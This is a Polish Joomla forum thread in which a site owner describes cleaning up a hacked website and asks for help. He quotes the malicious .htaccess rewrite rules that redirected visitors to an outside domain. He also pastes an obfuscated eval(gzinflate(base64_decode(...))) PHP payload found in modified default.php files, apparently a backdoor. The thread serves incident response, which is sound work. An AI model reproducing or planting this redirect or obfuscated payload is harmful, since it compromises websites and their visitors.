Usunięty trojan ale strona sie rozleciała
Wyniki 1 do 5 z 5

Temat: Usunięty trojan ale strona sie rozleciała

  1. #1
    Debiutant
    Dołączył
    10-09-2012
    Wpisy
    10
    Punkty
    2

    Domyślny Usunięty trojan ale strona sie rozleciała

    Witam,

    Wczoraj padła mi strona internetowa, okazało sie ze została zainfekowana, do kodu .htaccess dopisane zostało przekierowanie do jakies nieistniejace witryny
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
    RewriteRule ^.*$ celeirodoalgarvio.com/azzi.html?h=1376561 [L,R]
    </IfModule>
    55ezx1.jpg
    zczysciłem plik .htaccess, wyszyscilem komputer, pozmienialem hasła i niby wszystko ok, ale cos menu góre mi sie rozklekotało, moglibyście spojrzeć co jest grane ?
    kultura.tylko.to/
    Ostanio edytowane przez Bazyl : 01-02-2013 09:02

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wyga trzepiz awatar
    Dołączył
    06-01-2006
    Skąd
    SH | SC
    Wpisy
    3 528
    Punkty
    252

    Domyślny

    Czy jesteś pewny, że nie dokonano zmian w żadnym innym pliku ??
    Skąd pewność, że skutkiem ataku była tylko ingerencja w htaccess ?

  4. #3
    Debiutant
    Dołączył
    10-09-2012
    Wpisy
    10
    Punkty
    2

    Domyślny

    Szczerze ? Nie jestem pewien czy nie było ingerencji w inne pliki. Przeleciałem skanerem strone ponownie i pokazało że jest czysta , ale zdaje sobie sprawe że to żaden wyznacznik ;)
    Jakieś sugestie w jakich plikach moge jeszcze tego szukać ? Czy jest możliwość że ten malware coś zdziałał innego niż złośliwe odnosniki w kodach ?

  5. #4
    Senior PeFik awatar
    Dołączył
    18-02-2007
    Skąd
    Miasto Stu Mostów
    Wpisy
    5 465
    Punkty
    241

    Domyślny

    Myslisz ze ktos ci opisze wszytsko co masz zrobic, przeciez to material na grubszy artykul.
    Na wiki.joomla.pl bylo opisane co nalezy zrobic z grubsza.
    Z cala pewnoscia twoja Joomla ma dziure, i z cala pewnoscia ktos zmienil nie tylko jeden plik.
    Współautor bloga o systemie Joomla! -> blog.elimu.pl < oraz kilku książek i artykułów o tym CMS.

  6. #5
    Debiutant
    Dołączył
    10-09-2012
    Wpisy
    10
    Punkty
    2

    Domyślny

    Znalazłem artykuł i podziałałem.

    1.) hasła pozmieniane
    2.) przejrzałem wszystkie zmodyfikowane ostatnio pliki i pozmieniane były: htaccess i default.php wszystkie default o 22 godz. a htaccess o 2 w nocy, wszystko jednego dnia. Pokasowałem złosliwe odnośniki.
    3.) hostingodawca potwierdzil ze nastapily zmiany w kluczu strony. google nie wywala strony jako zarazoną.
    4.) strona zaczęła działać poprawnie, wszystko śmiga i trybi , pytanie tylko czy to nie cisza przed kolejną burzą ?

    Zaniepokojony jestem tylko plikami default.php które były modyfikowane a w których nie widze nic poidejzanego
    <?php eval(gzinflate(base64_decode("DdNFDqxaAgDQvfzRe2EA FykgnR5AFe4ukw7u7qy+/xpOTnEm/Z/qbcayT/biT5psxQf/X15kU178+ecXWxi37AlThRi1mFiDMFXJAb1ixaJAmkFjM/PqcWshIKySCGO8okuEKcR9yzDCPoyJBBCDr3h4hUp6hRD81QN1 xc+cmm9pLCFjpddDdYMafBFHnKHwLVuKaVqA+fouZDP7PLqqHb QQ4bwdroyXflY0se31DB40XQO+RBMge4Oj3g2KSu+jHrZvcoJU wn6Z21tKIOxX0tQ5949vjYJiWcT+5r0OClUGCr9AdhPBL3F5FI c+etEz+WJl+qQ8GkRtrmKFVAX9MKyNUnsNwDIJWgzU6HN56KY7 IyWC1E51JfckwwVtYw0HnPewGIIf4XVp3sznjSKyiOz2k+Am9+ WNZeV+aE7Vv2CaAl0IyYC33MmDla83+Z5ScuXawjIub/goRgkqkneiItnkpn3LZLiM2NmSUuMni9POvdveL0Sz391DwBDI yeoivwfx0XEtYcskFK3kyO6xp8W4JWQ/Pm+ZfdQKB2qdCfpXfi88LScbm1gUjnfvHEngr2WrW2ObD7G5f5 LufWyNwy8o3e8KG+8wYecFL4pl2+DT2tMANhiO0FSuoXbG7C2F SHJPs9yFPMxHIsOT7AqWOAwq1uhKX4rqIviHRqRbYWNEC5acPd Cm8Cs4YAF2suQu03uPfm2GRKIfeE2/O2WDHHLEvn6Xl5czNaCjjjSni3/pLtfTXrnDLjIGExjSQpA+pL/EXI1aJ0g+pnwo5KUn3xid0ZWEDzFTJm2fAD+H7xbZMgiE3xauP NufbxOgnFlvhHK6Z4+s0N6e1xAXHE3VwoeDRnusZHTcifmHUr1 zod5UA3F8bByUCJ93N/bMF6TVxr9RihC7OG+9z9rzVramMfphjPxfB29aYO/yTc9l49YW7Lyf+8Ysh5O7H+Z0A14w5K7i2eFSJ7D3j54exmbMV PHEE5bTNpY48eJMwF8CptRyN3oZPU1I3s++H1J6sheVga3jr3k WYTHxVdMR5wBp7h3Uli5m/hBtDC9uYhy0qdpMTeAsZ6zPWi8ju2eA7PFffbtlp5VzJWrgQbr xx0iVp6B4jTjfB5aA4SUeNZ52Wip56UYV7CL+JRFIo/F0q8MECa+1BEn5/jiAsQeAhA2fF+1Jea/0Hlz/VV27JrvDjhBYnUKoVDCnAm4sdK7BTcCkKZPsP99ePGqJbRbOxs Ry0G5xriLZ7TqPch7UlFauXw7SqYw3R1VzgrodRgEjPoDkstnU 74b2q1TUTaEM0Fi2YCD7sDxoUGjgdYu3n8dGCWw706g783m0ns 79SPvwGeCtC3EG6cXNCOMeFnCujOWfQJN8y7F8pHzxQC6Dq1eS ArrT3kwM0Rd/L7z/pEGa6euogmgebceHs3M7X9srx/KnsZWrD4HOHCIvhvbgej8XhplmjlA+ckjiCIYyD5V2GI7tXQJY lPnxh1lgdNGX1RwkaGSlGGGepjiYPlp9BFlOdCCgfC+8+9Picj axlIkRWA/9BZKOiIJDTfVXbz1o/34iOR7G59UXmv8RtyPStClLM0Rirs2D14tixYmwV8jlu84DOdZ sokLWIlJ754RjEedf7hW2NRvm88ixF8DC90MX7G5GFUQY3DBOM vDU8qzBr8WpiLw+PGepjbuluR0KvijKIAxrOogGEwGQyfsGF1g VaqHSI0EGV+Gonwc1Ys9iMtSiCP1a3ceJECaQ/dCI+XxCTuTTYT/BYDqdO/M3ZVH9ZBVUxhd487K1sqwYqZSaLZSWchs7UcZuMgVdUGUktSlw 6JckNmIwDJcZDF/Zf//5+/fvf/4P"))); ?>
    może widzicie w tym cos nie tak?

Podobne tematy

  1. mod_custom przypadkiem usunięty.
    przez Proxim na forum Rozszerzenia - problemy z obsługą, zarządzaniem
    Odpowiedzi: 4
    Ostatni post/autor: 16-09-2010, 17:39
  2. Usunięty plugin PageBreak
    przez hippo na forum Administracja - ogólne
    Odpowiedzi: 0
    Ostatni post/autor: 21-03-2010, 15:23
  3. Usunięty panel logowania.
    przez Dawox na forum Administracja Joomla!
    Odpowiedzi: 1
    Ostatni post/autor: 12-12-2008, 13:20
  4. Pilne-Usunięty admin
    przez efect1 na forum Administracja Joomla!
    Odpowiedzi: 10
    Ostatni post/autor: 14-04-2008, 22:00
  5. usunięty panel logowania
    przez mkgp na forum Administracja Joomla!
    Odpowiedzi: 2
    Ostatni post/autor: 12-02-2008, 21:56

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •